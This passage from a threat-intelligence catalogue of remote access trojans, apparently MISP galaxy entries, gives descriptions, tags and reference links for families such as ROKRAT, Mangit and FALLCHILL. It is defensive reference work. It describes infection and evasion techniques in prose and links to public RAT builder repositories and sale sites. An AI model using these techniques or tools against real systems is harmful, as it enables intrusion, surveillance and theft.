Their most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the install of the RAT but also ensures that the RAT will be ‘reinstalled’ after system restart.

The tag is: misp-galaxy:rat="Matryoshka"

View relationships graph

Matryoshka has relationships with:

similar: misp-galaxy:tool="Matryoshka" with estimative-language:likelihood-probability="likely"

Table 6048. Table References
Links
https://www.alienvault.com/blogs/security-essentials/matryoshka-malware-from-copykittens-group

Mangit

First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan’s infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazillian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victim’s browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victim’s browsers and push pop-ups to the victim asking for the verification code they just received.

The tag is: misp-galaxy:rat="Mangit"

Table 6049. Table References
Links
http://virusguides.com/newly-discovered-mangit-malware-offers-banking-trojan-service/
https://www.cyber.nj.gov/threat-profiles/trojan-variants/mangit
http://news.softpedia.com/news/new-malware-mangit-surfaces-as-banking-trojan-as-a-service-505458.shtml

LeGeNd

The tag is: misp-galaxy:rat="LeGeNd"

Table 6050. Table References
Links
http://www.connect-trojan.net/2016/08/legend-rat-v1.3-by-ahmed-ibrahim.html
http://www.connect-trojan.net/2016/11/legend-rat-v1.9-by-ahmed-ibrahim.html

Revenge-RAT

Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malware’s author didn’t bother obfuscating the RAT’s source code. This raised a question mark with the researchers, who couldn’t explain why VirusTotal scanners couldn’t pick it up as a threat right away.Revenge, which was written in Visual Basic, also didn’t feature too many working features, compared to similar RATs. Even Napolean admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.

The tag is: misp-galaxy:rat="Revenge-RAT"

Table 6051. Table References
Links
http://www.securitynewspaper.com/2016/08/31/unsophisticated-revenge-rat-released-online-free-exclusive/

vjw0rm 0.1

The tag is: misp-galaxy:rat="vjw0rm 0.1"

Table 6052. Table References
Links
https://twitter.com/malwrhunterteam/status/816993165119016960?lang=en

rokrat

ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangual Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco’s Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "kgf2016@yonsei.ac.kr," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with a the subject line, "Request Help" and attached malicious HWP filename, "I’m a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean-speakers.

The tag is: misp-galaxy:rat="rokrat"

rokrat is also known as:

ROKRAT

Table 6053. Table References
Links
http://blog.talosintelligence.com/2017/04/introducing-rokrat.html
http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

Qarallax

Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).

The tag is: misp-galaxy:rat="Qarallax"

Qarallax is also known as:

qrat

View relationships graph

Qarallax has relationships with:

similar: misp-galaxy:tool="qrat" with estimative-language:likelihood-probability="likely"

Table 6054. Table References
Links
https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/

MoonWind

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

The tag is: misp-galaxy:rat="MoonWind"

View relationships graph

MoonWind has relationships with:

similar: misp-galaxy:mitre-malware="MoonWind - S0149" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="MoonWind" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

Table 6055. Table References
Links
https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/
https://attack.mitre.org/wiki/Software/S0149

Remcos

Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.

The tag is: misp-galaxy:rat="Remcos"

View relationships graph

Remcos has relationships with:

similar: misp-galaxy:malpedia="Remcos" with estimative-language:likelihood-probability="likely"

Table 6056. Table References
Links
https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2
https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

Client Maximus

The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims’ web navigation and interrupt online banking session at will. After taking over a victim’s banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.

The tag is: misp-galaxy:rat="Client Maximus"

View relationships graph

Client Maximus has relationships with:

similar: misp-galaxy:malpedia="Client Maximus" with estimative-language:likelihood-probability="likely"

Table 6057. Table References
Links
https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/

TheFat RAT

Thefatrat a massive exploiting tool revealed >> An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most…

The tag is: misp-galaxy:rat="TheFat RAT"

Table 6058. Table References
Links
https://github.com/Screetsec/TheFatRat

RedLeaves

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

The tag is: misp-galaxy:rat="RedLeaves"

View relationships graph

RedLeaves has relationships with:

similar: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

Table 6059. Table References
Links
http://blog.jpcert.or.jp/2017/04/redleaves---malware-based-on-open-source-rat.html

Rurktar

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

The tag is: misp-galaxy:rat="Rurktar"

View relationships graph

Rurktar has relationships with:

similar: misp-galaxy:malpedia="Rurktar" with estimative-language:likelihood-probability="likely"

Table 6060. Table References
Links
http://www.securityweek.com/rurktar-malware-espionage-tool-development

RATAttack

RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim’s machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot’s Telegram token into the trojan’s configuration file. When a system is infected with RATAttack, it connects to the bot’s Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan’s code was available on GitHub then was taken down by the author on April 19, 2017.

The tag is: misp-galaxy:rat="RATAttack"

Table 6061. Table References
Links
https://www.cyber.nj.gov/threat-profiles/trojan-variants/ratattack

KhRAT

So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forecpoint here, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

The tag is: misp-galaxy:rat="KhRAT"

Table 6062. Table References
Links
https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/

RevCode

The tag is: misp-galaxy:rat="RevCode"

Table 6063. Table References
Links
https://revcode.eu/

AhNyth Android

Android Remote Administration Tool

The tag is: misp-galaxy:rat="AhNyth Android"

Table 6064. Table References
Links
https://github.com/AhMyth/AhMyth-Android-RAT

Socket23

SOCKET23 was launched from his web site and immedi- ately infected major French corporations between August and October 1998. The virus (distributing the Trojan) was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (now suppressed). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for ‘fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data’

The tag is: misp-galaxy:rat="Socket23"

Table 6065. Table References
Links
https://www.virusbulletin.com/uploads/pdf/magazine/1999/199908.pdf

PowerRAT

The tag is: misp-galaxy:rat="PowerRAT"

MacSpy

Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While the idea of malware-as-a-service (MaaS) isn’t a new one with players such as Tox and Shark the game, it can be said that MacSpy is one of the first seen for the OS X platform.

The tag is: misp-galaxy:rat="MacSpy"

View relationships graph

MacSpy has relationships with:

similar: misp-galaxy:malpedia="MacSpy" with estimative-language:likelihood-probability="likely"

Table 6066. Table References
Links
https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service
https://objective-see.com/blog/blog_0x25.html

DNSMessenger

Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of Powershell with various stages being completely fileless indicates an attacker who has taken significant measures to avoid detection.

The tag is: misp-galaxy:rat="DNSMessenger"

View relationships graph

DNSMessenger has relationships with:

similar: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

Table 6067. Table References
Links
http://blog.talosintelligence.com/2017/03/dnsmessenger.html

PentagonRAT

The tag is: misp-galaxy:rat="PentagonRAT"

Table 6068. Table References
Links
http://pentagon-rat.blogspot.fr/

NewCore

NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.

The tag is: misp-galaxy:rat="NewCore"

Table 6069. Table References
Links
https://www.cyber.nj.gov/threat-profiles/trojan-variants/newcore
https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations

Deeper RAT

The tag is: misp-galaxy:rat="Deeper RAT"

Xyligan

The tag is: misp-galaxy:rat="Xyligan"

H-w0rm

The tag is: misp-galaxy:rat="H-w0rm"

htpRAT

On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers utilized a new kind of Remote Access Trojan (RAT) that has not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversary’s arsenal in a campaign against Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands operators can execute using different command IDs —’file download’ or ‘file upload,’ for example—and must be completely rebuilt to have different functionality. htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision and effect. On the Command and Control (C2) server side, threat actors can build new functionality in commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victim’s network, simply by wrapping commands.

The tag is: misp-galaxy:rat="htpRAT"

View relationships graph

htpRAT has relationships with:

similar: misp-galaxy:malpedia="htpRAT" with estimative-language:likelihood-probability="likely"

Table 6070. Table References
Links
https://cdn.riskiq.com/wp-content/uploads/2017/10/RiskIQ-htpRAT-Malware-Attacks.pdf?_ga=2.159415805.1155855406.1509033001-1017609577.1507615928

FALLCHILL

According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

The tag is: misp-galaxy:rat="FALLCHILL"

View relationships graph

FALLCHILL has relationships with:

similar: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

Table 6071. Table References
Links
https://www.us-cert.gov/ncas/alerts/TA17-318A
https://securelist.com/operation-applejeus/87553/

UBoatRAT

Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May of 2017, was simple HTTP backdoor that uses a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added various new features to the code and released an updated version in June. The attacks with the latest variants we found in September have following characteristics. Targets personnel or organizations related to South Korea or video games industry Distributes malware through Google Drive Obtains C2 address from GitHub Uses Microsoft Windows Background Intelligent Transfer Service(BITS) to maintain persistence.

The tag is: misp-galaxy:rat="UBoatRAT"

Table 6072. Table References
Links
https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

CrossRat

The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool…which is able to target Windows, OSX, and Linux.”

The tag is: misp-galaxy:rat="CrossRat"

Table 6073. Table References
Links
https://digitasecurity.com/blog/2018/01/23/crossrat/

TSCookieRAT

TSCookie provides parameters such as C&C server information when loading TSCookieRAT. Upon the execution, information of the infected host is sent with HTTP POST request to an external server. (The HTTP header format is the same as TSCookie.) The data is RC4-encrypted from the beginning to 0x14 (the key is Date header value), which is followed by the information of the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1 for the data format.

The tag is: misp-galaxy:rat="TSCookieRAT"

Table 6074. Table References
Links
http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html

Coldroot

Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years. The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it’s rights in this [the RAT] field," but has since expanded to work all three major desktop operating systems — Linux, macOS, and Windows— according to a screenshot of its builder extracted from a promotional YouTube video.

The tag is: misp-galaxy:rat="Coldroot"

Table 6075. Table References
Links
https://www.bleepingcomputer.com/news/security/coldroot-rat-still-undetectable-despite-being-uploaded-on-github-two-years-ago/
https://github.com/xlinshan/Coldroot

Comnie

Comnie is a RAT originally identified by Sophos. It has been using Github, Tumbler and Blogspot as covert channels for its C2 communications. Comnie has been observed targetting government, defense, aerospace, high-tech and telecommunication sectors in Asia.

The tag is: misp-galaxy:rat="Comnie"

Table 6076. Table References
Links
https://exchange.xforce.ibmcloud.com/collection/East-Asia-Organizations-Victims-of-Comnie-Attack-12749a9dbc20e2f40b3ae99c43416d8c
https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

GravityRAT

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We’ve seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

The tag is: misp-galaxy:rat="GravityRAT"

Table 6077. Table References
Links
https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

ARS VBS Loader

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious "loaders".

The tag is: misp-galaxy:rat="ARS VBS Loader"

View relationships graph

ARS VBS Loader has relationships with:

similar: misp-galaxy:malpedia="ARS VBS Loader" with estimative-language:likelihood-probability="likely"

Table 6078. Table References
Links
https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/

RadRAT

RadRAT, its capabilities include: unfettered control of the compromised computer, lateral movement across the organization (Mimikatz-like credentials harvesting, NTLM hash harvesting from the Windows registry and implementation of the Pass-the-Hash attack on SMB connections) and rootkit-like detection-evasion mechanisms.

The tag is: misp-galaxy:rat="RadRAT"

View relationships graph

RadRAT has relationships with:

similar: misp-galaxy:malpedia="RadRAT" with estimative-language:likelihood-probability="likely"

Table 6079. Table References
Links
https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/
https://labs.bitdefender.com/wp-content/uploads/downloads/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

FlawedAmmyy

FlawedAmmyy, has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. The RAT is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software. As such FlawedAmmyy contains the functionality of the leaked version, including: Remote Desktop control, File system manager, Proxy support, Audio Chat.

The tag is: misp-galaxy:rat="FlawedAmmyy"

View relationships graph

FlawedAmmyy has relationships with:

similar: misp-galaxy:malpedia="FlawedAmmyy" with estimative-language:likelihood-probability="likely"

Table 6080. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

Spymaster Pro

Monitoring Software

The tag is: misp-galaxy:rat="Spymaster Pro"

Table 6081. Table References
Links
https://www.spymasterpro.com/
https://spycellphone.mobi/reviews/spymaster-pro-real-review-with-screenshots

NavRAT

Classic RAT that can download, upload, execute commands on the victim host and perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email

The tag is: misp-galaxy:rat="NavRAT"

View relationships graph

NavRAT has relationships with:

similar: misp-galaxy:malpedia="NavRAT" with estimative-language:likelihood-probability="likely"

Table 6082. Table References
Links
https://blog.talosintelligence.com/2018/05/navrat.html

joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.

The tag is: misp-galaxy:rat="joanap"

Table 6083. Table References
Links
https://www.us-cert.gov/ncas/alerts/TA18-149A

Sisfader

Sisfader maintains persistence installing itself as a system service, it is made up of multiple components ([1] Dropper - installing the malware, [2] Agent - main code of the RAT, [3] Config - written to the registry, [4] Auto Loader - responsible for extracting the Agent, the Config from the registry) and it has its own custom protocol for communication.

The tag is: misp-galaxy:rat="Sisfader"

View relationships graph

Sisfader has relationships with:

similar: misp-galaxy:malpedia="Sisfader" with estimative-language:likelihood-probability="likely"

Table 6084. Table References
Links
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/

SocketPlayer

The RAT is written in .NET, it uses socket.io for communication. Currently there are two variants of the malware, the 1st variant is a typical downloader whereas the 2nd one has download and C2 functionalities.

The tag is: misp-galaxy:rat="SocketPlayer"

Table 6085. Table References
Links
https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_SocketPlayer_Analysis.pdf
https://volon.io/2018/06/targeted-attack-on-indian-defense-officials-using-socketplayer-malware/

Hallaj PRO RAT

RAT

The tag is: misp-galaxy:rat="Hallaj PRO RAT"

Table 6086. Table References
Links
https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/

NukeSped

This threat can install other malware on your PC, including Trojan:Win32/NukeSped.B!dha and Trojan:Win32/NukeSped.C!dha. It can show you a warning message that says your files will be made publically available if you don’t follow the malicious hacker’s commands.

The tag is: misp-galaxy:rat="NukeSped"

Table 6087. Table References
Links
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj_{NukeSped-Z.aspx[https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj}NukeSped-Z.aspx]
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/NukeSped&ThreatID=-2147238204
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/NukeSped!bit&ThreatID=-2147238152
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/NukeSped
https://malwarefixes.com/threats/win32nukesped/
https://www.alienvault.com/forums/discussion/17301/alienvault-labs-threat-intelligence-update-for-usm-anywhere-march-25-march-31-2018

TheOneSpy

Remotely monitor and control any wrong activity of kids on all smartphones & computers

The tag is: misp-galaxy:rat="TheOneSpy"

Table 6088. Table References
Links
https://www.theonespy.com/

BONDUPDATER

BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization. The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.

The tag is: misp-galaxy:rat="BONDUPDATER"

Table 6089. Table References
Links
https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

FlawedGrace

Proofpoint also point out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that "extensive use of object-oriented and multithreaded programming techniques. "As a consequence, getting familiar with its internal structure takes a lot of time and is far from a simple task.

The tag is: misp-galaxy:rat="FlawedGrace"

Table 6090. Table References
Links
https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/

H-worm

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

The tag is: misp-galaxy:rat="H-worm"

Table 6091. Table References
Links
https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

Parasite-HTTP-RAT

The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections. The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.

The tag is: misp-galaxy:rat="Parasite-HTTP-RAT"

Parasite-HTTP-RAT is also known as:

Parasite HTTP

Table 6092. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks

Caesar RAT

Caesar is an HTTP-based RAT that allows you to remotely control devices directly from your browser.

The tag is: misp-galaxy:rat="Caesar RAT"

Table 6093. Table References
Links
https://securityonline.info/caesarrat-http-based-rat/

FlawedAmmy

During the month of October, Check Point researchers discovered a widespread malware campaign spreading a remote access trojan (dubbed “FlawedAmmy”) that allows attackers to take over victims’ computers and data. The campaign was the latest and most widespread delivering the ‘FlawedAmmyy’ RAT, following a number of campaigns that have spread this malware in recent months. The Trojan allows attackers to gain full access to the machine’s camera and microphone, collect screen grabs, steal credentials and sensitive files, and intrusively monitor the victims’ actions. As a result, FlawedAmmy is the first RAT to enter the Global Threat Index’s top 10 ranking.

The tag is: misp-galaxy:rat="FlawedAmmy"

Table 6094. Table References
Links
https://www.helpnetsecurity.com/2018/11/14/flawedammy-most-wanted-malware-list/

Felipe

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim’s debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

The tag is: misp-galaxy:rat="Felipe"

Table 6095. Table References
Links
https://www.zscaler.com/blogs/research/felipe-new-infostealer-trojan

Amavaldo Banking Trojan

Amavaldo is banking trojan writen in Delphi and known to targeting Spanish or Portuguese speaking countries. It contains backdoor functionality and can work as multi stage. Amavaldo also abuses legitimate tools and softwares

The tag is: misp-galaxy:rat="Amavaldo Banking Trojan"

Table 6096. Table References
Links
https://www.welivesecurity.com/2019/08/01/banking-trojans-amavaldo/

AsyncRAT

Open-Source Remote Administration Tool For Windows C# (RAT)

The tag is: misp-galaxy:rat="AsyncRAT"

Table 6097. Table References
Links
https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp
https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

InnfiRAT

new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine

The tag is: misp-galaxy:rat="InnfiRAT"

Table 6098. Table References
Links
https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more

KeyBase

In the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

The tag is: misp-galaxy:rat="KeyBase"

Table 6099. Table References
Links
https://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-family-exposed/

Warzone

Apparently existing since 2018

The tag is: misp-galaxy:rat="Warzone"

Table 6100. Table References
Links
https://warzone.pw

SDBbot

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence. SDBbot is composed of three pieces: an installer, a loader, and a RAT component.

The tag is: misp-galaxy:rat="SDBbot"

SDBbot is also known as:

SDB bot

Table 6101. Table References
Links
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

Sepulcher

A China-based APT has been sending organizations spear-phishing emails that distribute a never-before-seen intelligence-collecting RAT dubbed Sepulcher.

Researchers discovered the new malware being distributed over the past six months through two separate campaigns. The first, in March, targeted European diplomatic and legislative bodies, non-profit policy research organizations and global organizations dealing with economic affairs. The second, in July, targeted Tibetan dissidents. They tied the campaigns to APT group TA413, which researchers say has been associated with Chinese state interests and is known for targeting the Tibetan community.

“Based on the use of publicly known sender addresses associated with Tibetan dissident targeting and the delivery of Sepulcher malware payloads, [we] have attributed both campaigns to the APT actor TA413,” said Proofpoint researchers in a Wednesday analysis. “The usage of publicly known Tibetan-themed sender accounts to deliver Sepulcher malware demonstrates a short-term realignment of TA413’s targets of interest.”

The tag is: misp-galaxy:rat="Sepulcher"

Table 6102. Table References
Links
https://www.enigmasoftware.fr/logicielmalveillantsepulcher-supprimer/
https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/
https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher
https://cyware.com/news/chinese-apt-ta413-found-distributing-sepulcher-malware-176a0969

Guildma

The campaign spreads via phishing emails posing as invoices, tax reports, invitations and similar types of messages containing a ZIP archive attachment with a malicious LNK file. When a user opens the malicious LNK file, it abuses the Windows Management Instrumentation Command-line tool and silently downloads a malicious XSL file. The XSL file downloads all of Guildma’s modules and executes a first stage loader, which loads the rest of the modules. The malware is then active and waits for commands from the C&C server and/or specific user interactions, such as opening a webpage of one of the targeted banks.

The tag is: misp-galaxy:rat="Guildma"

Guildma is also known as:

Table 6103. Table References
Links
https://www.securityweek.com/guildma-malware-expands-targets-beyond-brazil

DarkWatchman

In late November, Prevailion’s Adversarial Counterintelligence Team (PACT) identified what appeared to be a malicious javascript-based Remote Access Trojan (RAT) that uses a robust Domain Generation Algorithm (DGA) to identify its Command and Control (C2) infrastructure and that utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation. This RAT, which PACT refers to by its internal codename “DarkWatchman”, has been observed being distributed by email and represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools. PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report.

The tag is: misp-galaxy:rat="DarkWatchman"

DarkWatchman is also known as:

Table 6104. Table References
Links
https://www.prevailion.com/darkwatchman-new-fileness-techniques/

Ragnatela

